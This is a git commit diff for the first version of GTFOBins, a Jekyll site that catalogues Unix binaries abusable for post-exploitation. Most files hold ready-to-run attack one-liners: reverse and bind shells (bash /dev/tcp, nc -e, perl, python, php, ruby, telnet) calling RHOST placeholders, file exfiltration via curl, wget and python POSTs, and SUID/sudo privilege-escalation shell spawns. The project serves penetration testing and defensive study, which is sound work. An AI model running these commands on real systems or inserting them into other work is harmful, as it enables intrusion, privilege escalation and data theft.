First commit

This commit is contained in:
Emilio Pinna 2018-05-21 20:14:41 +01:00
commit b81e57005a
57 changed files with 1082 additions and 0 deletions

3
.gitignore vendored Normal file
View File

@ -0,0 +1,3 @@
/_tmp/
/.sass-cache/
/_site/

3
CONTRIBUTING.md Normal file
View File

@ -0,0 +1,3 @@
# Contributing
TODO link to website URL

3
Gemfile Normal file
View File

@ -0,0 +1,3 @@
source 'https://rubygems.org'
gem 'jekyll'

63
Gemfile.lock Normal file
View File

@ -0,0 +1,63 @@
GEM
remote: https://rubygems.org/
specs:
addressable (2.5.2)
public_suffix (>= 2.0.2, < 4.0)
colorator (1.1.0)
concurrent-ruby (1.0.5)
em-websocket (0.5.1)
eventmachine (>= 0.12.9)
http_parser.rb (~> 0.6.0)
eventmachine (1.2.7)
ffi (1.9.23)
forwardable-extended (2.6.0)
http_parser.rb (0.6.0)
i18n (0.9.5)
concurrent-ruby (~> 1.0)
jekyll (3.8.1)
addressable (~> 2.4)
colorator (~> 1.0)
em-websocket (~> 0.5)
i18n (~> 0.7)
jekyll-sass-converter (~> 1.0)
jekyll-watch (~> 2.0)
kramdown (~> 1.14)
liquid (~> 4.0)
mercenary (~> 0.3.3)
pathutil (~> 0.9)
rouge (>= 1.7, < 4)
safe_yaml (~> 1.0)
jekyll-sass-converter (1.5.2)
sass (~> 3.4)
jekyll-watch (2.0.0)
listen (~> 3.0)
kramdown (1.16.2)
liquid (4.0.0)
listen (3.1.5)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
ruby_dep (~> 1.2)
mercenary (0.3.6)
pathutil (0.16.1)
forwardable-extended (~> 2.6)
public_suffix (3.0.2)
rb-fsevent (0.10.3)
rb-inotify (0.9.10)
ffi (>= 0.5.0, < 2)
rouge (3.1.1)
ruby_dep (1.5.0)
safe_yaml (1.0.4)
sass (3.5.6)
sass-listen (~> 4.0.0)
sass-listen (4.0.0)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
PLATFORMS
ruby
DEPENDENCIES
jekyll
BUNDLED WITH
1.16.1

10
Makefile Normal file
View File

@ -0,0 +1,10 @@
.PHONY: serve bundle
serve:
bundle exec jekyll serve
serve-public:
bundle exec jekyll serve --host 0.0.0.0
bundle:
bundle install

3
README.md Normal file
View File

@ -0,0 +1,3 @@
# GTFOBins
TODO link to website URL

15
_config.yml Normal file
View File

@ -0,0 +1,15 @@
title: GTFOBins
exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md']
permalink: pretty
collections:
gtfobins:
output: true
defaults:
- scope:
path: '_gtfobins'
values:
layout: bin

39
_data/functions.yml Normal file
View File

@ -0,0 +1,39 @@
exec-interactive:
label: Interactive
description: It executes interactive commands that may be exploited to break out from restricted shells.
exec-non-interactive:
label: Non-interactive
description: It executes non-interactive commands that may be exploited to break out from restricted shells.
suid-enabled:
label: SUID
description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor.
suid-limited:
label: Limited SUID
description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor. Its functioning depends on the default operating systems system shell and tipically works only on Debian Linux.
sudo-enabled:
label: Sudo
description: It runs in privileged contexts and may be used to escalate or maintain privileges if enabled on `sudo`.
download:
label: Download
description: It can download remote files.
upload:
label: Upload
description: It can exfiltrate files on the network.
bind-shell:
label: Bind shell
description: It can bind a shell to a local port to allow remote network access.
reverse-shell:
label: Reverse shell
description: It can send back a reverse shell to a listening attacker to open a remote network access.
load-library:
label: Library load
description: It loads shared libraries that may be used to run code in the binary execution context.

9
_gtfobins/awk.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: awk 'BEGIN {system("/bin/sh")}'
sudo-enabled:
- code: sudo awk 'BEGIN {system("/bin/sh -p")}'
suid-limited:
- code: ./awk 'BEGIN {system("/bin/sh -p")}'
---

40
_gtfobins/bash.md Normal file
View File

@ -0,0 +1,40 @@
---
functions:
exec-interactive:
- code: bash
sudo-enabled:
- code: sudo bash
suid-enabled:
- code: ./bash -p
upload:
- description: Send local file in the body of an HTTP POST request.
code: |
RHOST=10.0.0.1
RPORT=8000
LFILE=file_to_send
echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT
- description: Send local file using a TCP connection.
code: |
RHOST=10.0.0.1
RPORT=8000
LFILE=file_to_send
cat $LFILE > /dev/tcp/$RHOST/$RPORT
download:
- description: Fetch a remote file via HTTP GET request.
code: |
RHOST=10.0.0.1
RPORT=8000
LFILE=file_to_get
(echo -e "GET /$LFILE HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<>/dev/tcp/$RHOST/$RPORT | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; do read i; done; cat) > $LFILE
- description: Fetch remote file using a TCP connection.
code: |-
RHOST=10.0.0.1
RPORT=8000
LFILE=file_to_get
bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1 > $LFILE
reverse-shell:
- code: |
RHOST=127.0.0.1
RPORT=8000
exec 5<&-;exec 5<>/dev/tcp/$RHOST/$RPORT;while read line 0<&5; do $line 2>&5 >&5; done
---

9
_gtfobins/csh.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: csh
sudo-enabled:
- code: sudo csh
suid-enabled:
- code: ./csh -b
---

15
_gtfobins/curl.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
upload:
- description: Send local file with an HTTP POST request.
code: |
URL=http://10.0.0.1/
LFILE=file_to_send
curl -X POST -d @$file_to_send $URL
download:
- description: Fetch a remote file via HTTP GET request.
code: |-
export URL=http://10.0.0.1/file_to_get
export LFILE=file_to_get
curl $URL -o $LFILE
---

15
_gtfobins/ed.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
exec-interactive:
- code: |
ed
!/bin/sh
sudo-enabled:
- code: |
sudo ed
!/bin/sh
suid-limited:
- code: |-
./ed
!/bin/sh -p
---

9
_gtfobins/emacs.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: emacs -Q -nw --eval '(term "/bin/sh")'
sudo-enabled:
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
suid-enabled:
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
---

9
_gtfobins/env.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: env /bin/sh
sudo-enabled:
- code: sudo env /bin/sh
suid-enabled:
- code: ./env /bin/sh -p
---

9
_gtfobins/expect.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: expect -c 'spawn /bin/sh;interact'
sudo-enabled:
- code: sudo expect -c 'spawn /bin/sh;interact'
suid-enabled:
- code: ./expect -c 'spawn /bin/sh -p;interact'
---

9
_gtfobins/find.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: find . -exec /bin/sh \; -quit
sudo-enabled:
- code: sudo find . -exec /bin/sh \; -quit
suid-enabled:
- code: ./find . -exec /bin/sh -p \; -quit
---

23
_gtfobins/ftp.md Normal file
View File

@ -0,0 +1,23 @@
---
functions:
exec-interactive:
- code: |
ftp
!/bin/sh
sudo-enabled:
- code: |
sudo ftp
!/bin/sh
upload:
- description: Send local file to a FTP server.
code: |
RHOST=10.0.0.1
ftp $RHOST
put file_to_send
download:
- description: Fetch a remote file from a FTP server.
code: |
RHOST=10.0.0.1
ftp $RHOST
get file_to_get
---

7
_gtfobins/gdb.md Normal file
View File

@ -0,0 +1,7 @@
---
functions:
exec-interactive:
- code: gdb -nx -ex '!sh' -ex quit
sudo-enabled:
- code: sudo gdb -nx -ex '!sh' -ex quit
---

9
_gtfobins/ionice.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: ionice /bin/sh
sudo-enabled:
- code: sudo ionice /bin/sh
suid-enabled:
- code: ./ionice /bin/sh -p
---

10
_gtfobins/ld.so.md Normal file
View File

@ -0,0 +1,10 @@
---
description: Ld.so is the Linux dynamic linker/loader. Its file name and location might change between Linux versions.
functions:
exec-interactive:
- code: /lib/ld.so /bin/sh
sudo-enabled:
- code: sudo /lib/ld.so /bin/sh
suid-enabled:
- code: ./ld.so /bin/sh -p
---

18
_gtfobins/less.md Normal file
View File

@ -0,0 +1,18 @@
---
functions:
exec-interactive:
- code: |
less /etc/profile
!/bin/sh
- code: |
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
v
sudo-enabled:
- code: |
sudo less /etc/profile
!/bin/sh
suid-limited:
- code: |-
./less /etc/profile
!/bin/sh -p
---

15
_gtfobins/man.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
exec-interactive:
- code: |
man man
!/bin/sh
sudo-enabled:
- code: |
sudo man man
!/bin/sh
suid-limited:
- code: |-
./man man
!/bin/sh -p
---

15
_gtfobins/more.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
exec-interactive:
- code: |
TERM= more /etc/profile
!/bin/sh
sudo-enabled:
- code: |
TERM= sudo -E more /etc/profile
!/bin/sh
suid-limited:
- code: |-
TERM= ./more /etc/profile
!/bin/sh -p
---

25
_gtfobins/nc.md Normal file
View File

@ -0,0 +1,25 @@
---
functions:
upload:
- description: Serve a file on a TCP port.
code: |
RHOST=10.0.0.1
RPORT=8000
LFILE=file_to_send
nc $RHOST $RPORT < "$LFILE"
download:
- description: Fetch remote file from a remote TCP port.
code: |-
LPORT=8000
LFILE=file_to_get
nc -l -p $LPORT > "$LFILE"
reverse-shell:
- code: |
RHOST=10.0.0.1
RPORT=8000
nc -e /bin/sh $RHOST $RPORT
bind-shell:
- code: |
LPORT=8000
nc -lp $LPORT -e /bin/sh
---

14
_gtfobins/perl.md Normal file
View File

@ -0,0 +1,14 @@
---
functions:
exec-interactive:
- code: perl -e 'exec "/bin/sh";'
sudo-enabled:
- code: sudo perl -e 'exec "/bin/sh";'
suid-enabled:
- code: ./perl -e 'exec "/bin/sh";'
reverse-shell:
- code: |
export RHOST=127.0.0.1
export RPORT=12346
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
---

39
_gtfobins/php.md Normal file
View File

@ -0,0 +1,39 @@
---
functions:
exec-non-interactive:
- code: |
export CMD="ls /"
php -r 'system($_ENV["CMD"]);'
- code: |
export CMD="ls /"
php -r 'passthru($_ENV["CMD"]);'
- code: |
export CMD="ls /"
php -r 'print(shell_exec($_ENV["CMD"]));'
- code: |
export CMD="ls /"
php -r '$r=array(); exec($_ENV["CMD"], $r); print(join(\"\\n\",$r));'
- code: |
export CMD="ls /"
php -r '$h=@popen($_ENV["CMD"],"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
- code: |
export CMD="ls /"
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open($_ENV["CMD"], $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
upload:
- description: Serve files in the local folder running an HTTP server.
code: |
LHOST=0.0.0.0
LPORT=8888
php -S $LHOST:$LPORT
download:
- description: Fetch a remote file via HTTP GET request.
code: |-
export URL=http://10.0.0.1/file_to_get
export LFILE=file_to_get
php -r '$c=file_get_contents($_ENV["URL"]);file_put_contents($_ENV["LFILE"], $c);'
reverse-shell:
- code: |
export RHOST=127.0.0.1
export RPORT=8000
php -r '$sock=fsockopen($_ENV["RHOST"],$_ENV["RPORT"]);exec("/bin/sh -i <&3 >&3 2>&3");'
---

32
_gtfobins/python2.md Normal file
View File

@ -0,0 +1,32 @@
---
functions:
exec-interactive:
- code: python -c 'import os; os.system("/bin/sh")'
sudo-enabled:
- code: sudo python -c 'import os; os.system("/bin/sh")'
suid-enabled:
- code: ./python -c 'import os; os.system("/bin/sh -p")'
upload:
- description: Send local file via "d" parameter of a HTTP POST request.
code: |
export URL=http://10.0.0.1/
export LFILE=file_to_send
python -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))'
- description: Serve files in the local folder running an HTTP server.
code: |
export LPORT=8888
python -m SimpleHTTPServer $LPORT
download:
- description: Fetch a remote file via HTTP GET request.
code: |-
export URL=http://10.0.0.1/file_to_get
export LFILE=file_to_get
python -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
reverse-shell:
- code: |
export RHOST=127.0.0.1
export RPORT=8000
python -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
load-library:
- code: python -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
---

32
_gtfobins/python3.md Normal file
View File

@ -0,0 +1,32 @@
---
functions:
exec-interactive:
- code: python3 -c 'import os; os.system("/bin/sh")'
sudo-enabled:
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
suid-enabled:
- code: ./python3 -c 'import os; os.system("/bin/sh -p")'
upload:
- description: Send local file via "d" parameter of a HTTP POST request.
code: |
export URL=http://10.0.0.1/
export LFILE=file_to_send
python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
- description: Serve files in the local folder running an HTTP server.
code: |
LPORT=8888
python3 -m http.server $LPORT
download:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://10.0.0.1/file_to_get
export LFILE=file_to_get
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
reverse-shell:
- code: |
export RHOST=127.0.0.1
export RPORT=8000
python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
load-library:
- code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
---

9
_gtfobins/rpm.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
sudo-enabled:
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled:
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
---

9
_gtfobins/rpmquery.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
sudo-enabled:
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled:
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
---

19
_gtfobins/ruby.md Normal file
View File

@ -0,0 +1,19 @@
---
functions:
exec-interactive:
- code: ruby -e 'exec "/bin/sh"'
sudo-enabled:
- code: sudo ruby -e 'exec "/bin/sh"'
reverse-shell:
- code: |
export RHOST=10.0.0.1
export RPORT=8000
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
load-library:
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
upload:
- description: Serve files in the local folder running an HTTP server.
code: |
export LPORT=8888
ruby -run -e httpd . -p $LPORT
---

36
_gtfobins/scp.md Normal file
View File

@ -0,0 +1,36 @@
---
functions:
exec-non-interactive:
- code: |
TF=$(mktemp)
CMD="touch /tmp/unrestricted"
echo "$CMD" > "$TF"
chmod +x "$TF"
scp -S $TF x y:
sudo-enabled:
- code: |
TF=$(mktemp)
CMD="touch /tmp/unrestricted"
echo "$CMD" > "$TF"
chmod +x "$TF"
sudo scp -S $TF x y:
suid-limited:
- code: |
TF=$(mktemp)
CMD="touch /tmp/unrestricted"
echo "$CMD" > "$TF"
chmod +x "$TF"
./scp -S $TF a b:
upload:
- description: Send local file to a SSH server.
code: |
RPATH=user@10.0.0.1:~/where_to_save
LPATH=file_to_send
scp $LFILE $RPATH
download:
- description: Fetch a remote file from a SSH server.
code: |
RPATH=user@10.0.0.1:~/file_to_get
LFILE=where_to_save
scp $RPATH $LFILE
---

9
_gtfobins/setarch.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: setarch $(arch) /bin/sh
sudo-enabled:
- code: setarch $(arch) /bin/sh
suid-enabled:
- code: ./setarch $(arch) /bin/sh -p
---

20
_gtfobins/ssh.md Normal file
View File

@ -0,0 +1,20 @@
---
functions:
exec-interactive:
- description: Reconnecting may help bypassing restricted shells.
code: ssh localhost /bin/bash --noprofile --norc
download:
- description: Fetch a remote file from a SSH server.
code: |
HOST=user@10.0.0.1
RPATH=file_to_get
LPATH=where_to_save
ssh $HOST "cat $RPATH" > $LPATH
upload:
- description: Send local file to a SSH server.
code: |
HOST=user@10.0.0.1
RPATH=where_to_save
LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH
---

9
_gtfobins/strace.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: strace -o /dev/null /bin/sh
sudo-enabled:
- code: sudo strace -o /dev/null /bin/sh
suid-enabled:
- code: ./strace -o /dev/null /bin/sh -p
---

10
_gtfobins/tar.md Normal file
View File

@ -0,0 +1,10 @@
---
functions:
exec-interactive:
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
sudo-enabled:
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
suid-limited:
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh
-p"
---

9
_gtfobins/taskset.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: taskset 1 /bin/sh
sudo-enabled:
- code: sudo taskset 1 /bin/sh
suid-enabled:
- code: ./taskset 1 /bin/sh -p
---

15
_gtfobins/tclsh.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
exec-interactive:
- code: |
tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
sudo-enabled:
- code: |
sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
suid-enabled:
- code: |
./tclsh
exec /bin/sh -p <@stdin >@stdout 2>@stderr
---

34
_gtfobins/telnet.md Normal file
View File

@ -0,0 +1,34 @@
---
functions:
exec-interactive:
- code: |
RHOST=www.google.com
RPORT=80
telnet $RHOST $RPORT
^]
!/bin/sh
description: MacOS only.
reverse-shell:
- code: |
RHOST=127.0.0.1
RPORT=8000
TF=$(mktemp)
rm $TF
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF
sudo-enabled:
- code: |
RHOST=www.google.com
RPORT=80
sudo telnet $RHOST $RPORT
^]
!/bin/sh
description: MacOS only.
suid-limited:
- code: |
RHOST=www.google.com
RPORT=80
./telnet $RHOST $RPORT
^]
!/bin/sh
description: MacOS only.
---

15
_gtfobins/tftp.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
upload:
- description: Send local file to a TFTP server.
code: |
RHOST=10.0.0.1
tftp $RHOST
put file_to_send
download:
- description: Fetch a remote file from a TFTP server.
code: |
RHOST=10.0.0.1
tftp $RHOST
get file_to_get
---

13
_gtfobins/vi.md Normal file
View File

@ -0,0 +1,13 @@
---
functions:
exec-interactive:
- code: vi -c ':!/bin/sh'
- code: |
vi
:set shell=/bin/sh
:shell
sudo-enabled:
- code: sudo vi -c ':!/bin/sh'
suid-enabled:
- code: ./vi -c ':!/bin/sh -p'
---

15
_gtfobins/wget.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
upload:
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request.
code: |
export URL=http://10.0.0.1/
export LFILE=file_to_send
wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
download:
- description: Fetch a remote file via HTTP GET request.
code: |-
export URL=http://10.0.0.1/file_to_get
export LFILE=file_to_get
wget $URL -O $LFILE
---

11
_gtfobins/wish.md Normal file
View File

@ -0,0 +1,11 @@
---
functions:
exec-interactive:
- code: |
wish
exec /bin/sh <@stdin >@stdout 2>@stderr
sudo-enabled:
- code: |
sudo wish
exec /bin/sh <@stdin >@stdout 2>@stderr
---

9
_gtfobins/zsh.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: zsh
sudo-enabled:
- code: sudo zsh
suid-enabled:
- code: ./zsh
---

57
_includes/bin_table.html Normal file
View File

@ -0,0 +1,57 @@
<input id="bin-search" type="text" placeholder="Filter by name, just start typing..."/>
<div id="bin-table-wrapper">
<table id="bin-table">
<thead>
<tr>
<th>Binary</th>
<th>Functions</th>
</tr>
</thead>
<tbody>
{% for file in site.gtfobins %}
<tr>
<td><a href="{{ file.url }}" class="bin-name">{% include get_bin_name path=file.path %}</a></td>
<td>{% include function_list.html bin=file %}</td>
</tr>
{% endfor %}
</tbody>
<tfoot>
<tr><td id="search-message" colspan="2">No binary matches...</td></tr>
</tfoot>
</table>
</div>
<script>
var searchBox = document.querySelector('#bin-search');
var searchMessage = document.querySelector('#search-message');
searchMessage.style.display = 'none';
// ensure height during filtering
var binTableWrapper = document.querySelector('#bin-table-wrapper');
binTableWrapper.style.height = binTableWrapper.clientHeight + 'px';
searchBox.addEventListener('input', function () {
var query = searchBox.value.toLowerCase().trim();
var noResults = true;
document.querySelectorAll('#bin-table tbody tr').forEach(function (row) {
var binName = row.firstElementChild.firstElementChild.innerText;
if (binName.indexOf(query) !== -1) {
row.style.display = '';
noResults = false;
} else {
row.style.display = 'none';
}
});
searchMessage.style.display = noResults ? '' : 'none';
});
addEventListener('keydown', function (event) {
if (event.key.toLowerCase().match(/^[a-z]$/)) {
searchBox.focus();
}
});
</script>

View File

@ -0,0 +1,6 @@
<ul class="function-list">
{% for function in include.bin.functions %}
{% assign type = function[0] %}
<li><a href="{{ include.bin.url }}#{{ type }}">{{ site.data.functions[type].label }}</a></li>
{% endfor %}
</ul>

View File

@ -0,0 +1,7 @@
<dl>
{% for function_pair in site.data.functions %}
{% assign function = function_pair[1] %}
<dt class="function-name">{{ function.label }}</dt>
<dd>{{ function.description | markdownify }}</dd>
{% endfor %}
</dl>

1
_includes/get_bin_name Normal file
View File

@ -0,0 +1 @@
{% assign fn_parts = include.path | split: '/' | last | split: '.' %}{% assign fn_parts_size = fn_parts | size %}{% if fn_parts_size < 3 %}{{- fn_parts[0] -}}{% else %}{{- fn_parts[0] -}}.{{- fn_parts[1] -}}{% endif %}

View File

@ -0,0 +1,6 @@
<h1>
{% if page.url != '/' %}
<a href="/">..</a> /
{% endif %}
{{ include.title }}
</h1>

46
_layouts/bin.html Normal file
View File

@ -0,0 +1,46 @@
---
layout: common
---
{% capture bin_name %}{% include get_bin_name path=page.path %}{% endcapture %}
{% include page_title.html title=bin_name %}
{% include function_list.html bin=page %}
{{ page.description | markdownify }}
{% for function in page.functions %}
{% assign function_name = function[0] %}
{% assign examples = function[1] %}
<h2 id="{{ function_name }}" class="function-name">
{{- site.data.functions[function_name].label -}}
</h2>
{{ site.data.functions[function_name].description | markdownify }}
{% for example in examples %}
<div class="example">
{{ example.description | markdownify }}
{% capture code %}
{%- if function_name == 'suid-enabled' or function_name == 'suid-limited' %}
cp $(which {{ bin_name }}) .
sudo chown 0 ./{{ bin_name }}
sudo chmod +s ./{{ bin_name }}
{% endif %}
{{ example.code }}
{% endcapture %}
<pre><code>
{{- code | strip -}}
</code></pre>
</div>
{% endfor %}
{% endfor %}

22
_layouts/common.html Normal file
View File

@ -0,0 +1,22 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>
{{ site.title }}
{% if page.url != '/' %}
|
{% if page.layout == 'bin' %}
{{ page.title | downcase }}
{% else %}
{{ page.title }}
{% endif %}
{% endif %}
</title>
<link rel="stylesheet" href="/style.css" type="text/css"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, user-scalable=yes">
</head>
<body>
{{ content }}
</body>
</html>

7
_layouts/page.html Normal file
View File

@ -0,0 +1,7 @@
---
layout: common
---
{% include page_title.html title=page.title %}
{{ content }}

45
contribute.md Normal file
View File

@ -0,0 +1,45 @@
---
layout: page
title: Contribute
---
## Structure
Each GTFO binary is defined in a file in the `_gtfobins/` folder named as `<binary name>.md`, such file consists only of a [YAML] front matter which describes the binary and its functions.
[YAML]: http://yaml.org/
The full syntax is the following:
```
description: Optional description of the binary
functions:
FUNCTION:
- description: Optional description of the example
code: Code of the example
- ....
FUNCTION:
- description: Optional description of the example
code: Code of the example
- ...
...
```
Where `FUNCTION` is one of the values described in the `_data/functions.yml` file.
Feel free to use any file in the `_gtfobins/` folder as an example.
Pull request process
--------------------
Vendor software is accepted as well as standard Unix binaries. Binaries and techniques that only works on certain operating systems and versions are accepted and such limitations shall be noted in the `description` field.
Before sending a pull request of a new binary or function, ensure the following:
1. Verify the function works on at least one type of modern Unix system.
2. Classifying SUID-related functions may be tricky because they depend on how the default shell behaves on different systems (i.e. Ubuntu vs. Debian) and how the external command is called (i.e. `exec()` family vs. `system()`). Check how the binary behaves:
- The function is considered `suid-enabled` if runs external commands with SUID privileges on Ubuntu Linux.
- The function is considered `suid-limited` if runs external commands with SUID privileges on Debian but it drops the privileges on Ubuntu Linux.
3. Verify `sudo-enabled` function runs external commands under the `sudo` privileged context.
Pull requests adding new functions in `_data/functions.yml` are allowed and subjected to project maintainers vetting.

8
functions.md Normal file
View File

@ -0,0 +1,8 @@
---
layout: page
title: Functions
---
A binary may support one or more of the following functions:
{% include functions_description.html %}

16
index.md Normal file
View File

@ -0,0 +1,16 @@
---
layout: page
title: GTFOBins
---
GTFOBins is a curated list of Unix binaries that can be leveraged by an attacker to bypass system security restrictions.
This was inspired by the [LOLBins and LOLScripts](https://github.com/api0cradle/LOLBAS) project for Windows environment.
The project collects legitimate Unix binaries that can be abused to <strike>get the f**k</strike> break out restricted shells, escalate or maintain elevated privileges, download or exfiltrate files, and facilitate the other post-exploitation tasks outlined [here](/functions/).
GTFOBins aims to be a shared project where everyone can contribute with additional binaries and techniques. You can find detailed instructions [here](/contribute/).
## List of GTFOBins
{% include bin_table.html %}

117
style.scss Normal file
View File

@ -0,0 +1,117 @@
---
---
$accent: #bf0707;
$lighter: #fff4f4;
$hover: #ff0000;
// layout
@media (min-width: 1000px) {
body {
width: 800px;
margin: 0 auto;
}
}
// common tags
body {
font-family: sans, sans-serif;
}
code {
padding: 0.15em 0.25em;
border-radius: 0.25em;
color: $accent;
background: $lighter;
}
pre {
background: $lighter;
padding: 1em;
overflow-x: auto;
code {
padding: 0;
border-radius: 0;
}
}
a:link, a:visited {
color: $accent;
}
a:hover {
color: $hover;
}
// fragment targets
*:target {
border-left: 5px solid $accent;
padding-left: 5px;
}
// binary list and search
#bin-search {
padding: 0.5em;
width: 100%;
box-sizing: border-box;
}
#bin-table {
width: 100%;
th, td {
padding: 0.2em 1em;
}
th {
text-align: left;
}
#search-message {
text-align: center;
padding: 1em;
}
}
// function description
.function-list {
font-size: 0.8rem;
list-style: none;
padding: 0;
margin: 0;
li {
display: inline-block;
padding: 0.25em 0.5em;
margin: 0.05em 0;
border: 1px solid $accent;
a:link, a:visited {
color: $accent;
text-decoration: none;
}
&:hover, a:hover {
color: $hover;
border-color: $hover;
}
}
}
// classes
.bin-name {
font-family: monospace;
font-size: 1.2rem;
}
.function-name {
font-size: 1.4rem;
font-weight: bold;
}